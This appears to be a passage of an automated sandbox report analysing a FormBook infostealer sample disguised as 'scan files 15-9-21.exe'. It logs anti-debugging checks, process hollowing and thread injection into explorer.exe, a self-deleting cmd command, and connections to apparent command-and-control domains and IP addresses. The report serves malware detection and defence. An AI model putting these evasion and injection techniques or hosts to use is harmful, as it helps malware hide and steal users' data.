Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368C577 mov eax, dword ptr fs:[00000030h] 13_2_0368C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A3D43 mov eax, dword ptr fs:[00000030h] 13_2_036A3D43
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368B944 mov eax, dword ptr fs:[00000030h] 13_2_0368B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368B944 mov eax, dword ptr fs:[00000030h] 13_2_0368B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E3540 mov eax, dword ptr fs:[00000030h] 13_2_036E3540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03687D50 mov eax, dword ptr fs:[00000030h] 13_2_03687D50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738D34 mov eax, dword ptr fs:[00000030h] 13_2_03738D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov eax, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov eax, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov eax, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov eax, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov ecx, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h] 13_2_03694D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h] 13_2_03694D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h] 13_2_03694D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369513A mov eax, dword ptr fs:[00000030h] 13_2_0369513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369513A mov eax, dword ptr fs:[00000030h] 13_2_0369513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366AD30 mov eax, dword ptr fs:[00000030h] 13_2_0366AD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036EA537 mov eax, dword ptr fs:[00000030h] 13_2_036EA537
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669100 mov eax, dword ptr fs:[00000030h] 13_2_03669100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669100 mov eax, dword ptr fs:[00000030h] 13_2_03669100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669100 mov eax, dword ptr fs:[00000030h] 13_2_03669100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03718DF1 mov eax, dword ptr fs:[00000030h] 13_2_03718DF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0366B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0366B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0366B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036F41E8 mov eax, dword ptr fs:[00000030h] 13_2_036F41E8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367D5E0 mov eax, dword ptr fs:[00000030h] 13_2_0367D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367D5E0 mov eax, dword ptr fs:[00000030h] 13_2_0367D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036935A1 mov eax, dword ptr fs:[00000030h] 13_2_036935A1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E69A6 mov eax, dword ptr fs:[00000030h] 13_2_036E69A6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036961A0 mov eax, dword ptr fs:[00000030h] 13_2_036961A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036961A0 mov eax, dword ptr fs:[00000030h] 13_2_036961A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h] 13_2_036E51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h] 13_2_036E51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h] 13_2_036E51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h] 13_2_036E51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h] 13_2_03691DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h] 13_2_03691DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h] 13_2_03691DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 mov eax, dword ptr fs:[00000030h] 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 mov eax, dword ptr fs:[00000030h] 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 mov eax, dword ptr fs:[00000030h] 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 mov eax, dword ptr fs:[00000030h] 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368C182 mov eax, dword ptr fs:[00000030h] 13_2_0368C182
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A185 mov eax, dword ptr fs:[00000030h] 13_2_0369A185
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369FD9B mov eax, dword ptr fs:[00000030h] 13_2_0369FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369FD9B mov eax, dword ptr fs:[00000030h] 13_2_0369FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692990 mov eax, dword ptr fs:[00000030h] 13_2_03692990
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03722073 mov eax, dword ptr fs:[00000030h] 13_2_03722073
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368746D mov eax, dword ptr fs:[00000030h] 13_2_0368746D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03731074 mov eax, dword ptr fs:[00000030h] 13_2_03731074
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A44B mov eax, dword ptr fs:[00000030h] 13_2_0369A44B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03680050 mov eax, dword ptr fs:[00000030h] 13_2_03680050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03680050 mov eax, dword ptr fs:[00000030h] 13_2_03680050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FC450 mov eax, dword ptr fs:[00000030h] 13_2_036FC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FC450 mov eax, dword ptr fs:[00000030h] 13_2_036FC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369BC2C mov eax, dword ptr fs:[00000030h] 13_2_0369BC2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h] 13_2_0367B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h] 13_2_0367B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h] 13_2_0367B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h] 13_2_0367B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h] 13_2_036E6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h] 13_2_036E6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h] 13_2_036E6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h] 13_2_036E6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03734015 mov eax, dword ptr fs:[00000030h] 13_2_03734015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03734015 mov eax, dword ptr fs:[00000030h] 13_2_03734015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h] 13_2_036E7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h] 13_2_036E7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h] 13_2_036E7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373740D mov eax, dword ptr fs:[00000030h] 13_2_0373740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373740D mov eax, dword ptr fs:[00000030h] 13_2_0373740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373740D mov eax, dword ptr fs:[00000030h] 13_2_0373740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_037214FB mov eax, dword ptr fs:[00000030h] 13_2_037214FB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036658EC mov eax, dword ptr fs:[00000030h] 13_2_036658EC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h] 13_2_036E6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h] 13_2_036E6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h] 13_2_036E6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738CD6 mov eax, dword ptr fs:[00000030h] 13_2_03738CD6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov ecx, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A90AF mov eax, dword ptr fs:[00000030h] 13_2_036A90AF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369F0BF mov ecx, dword ptr fs:[00000030h] 13_2_0369F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369F0BF mov eax, dword ptr fs:[00000030h] 13_2_0369F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369F0BF mov eax, dword ptr fs:[00000030h] 13_2_0369F0BF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669080 mov eax, dword ptr fs:[00000030h] 13_2_03669080
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E3884 mov eax, dword ptr fs:[00000030h] 13_2_036E3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E3884 mov eax, dword ptr fs:[00000030h] 13_2_036E3884
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367849B mov eax, dword ptr fs:[00000030h] 13_2_0367849B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_00409B20 LdrLoadDll, 2_2_00409B20
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.valorplanodesaudemaranhao.info
Source: C:\Windows\explorer.exe Network Connect: 172.67.196.84 80
Source: C:\Windows\explorer.exe Domain query: www.everybankatm.com
Source: C:\Windows\explorer.exe Domain query: www.nordiqueluxury.com
Source: C:\Windows\explorer.exe Domain query: www.quickskiplondon.com
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe Domain query: www.singularity.institute
Source: C:\Windows\explorer.exe Domain query: www.parakhonskiy.com
Source: C:\Windows\explorer.exe Domain query: www.lifewithbriana.com
Source: C:\Windows\explorer.exe Network Connect: 35.237.65.63 80
Source: C:\Windows\explorer.exe Network Connect: 84.34.147.60 80
Source: C:\Windows\explorer.exe Domain query: www.municipiodeanton.net
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: B40000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Memory written: C:\Users\user\Desktop\scan files 15-9-21.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 3292
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process created: C:\Users\user\Desktop\scan files 15-9-21.exe C:\Users\user\Desktop\scan files 15-9-21.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 00000003.00000000.270333689.0000000005F40000.00000004.00000001.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.358263429.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 00000003.00000000.280386762.0000000001400000.00000002.00020000.sdmp, WWAHost.exe, 0000000D.00000002.527970458.0000000005E90000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Users\user\Desktop\scan files 15-9-21.exe VolumeInformation
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.scan files 15-9-21.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.342717924.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.340222255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.296739231.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORY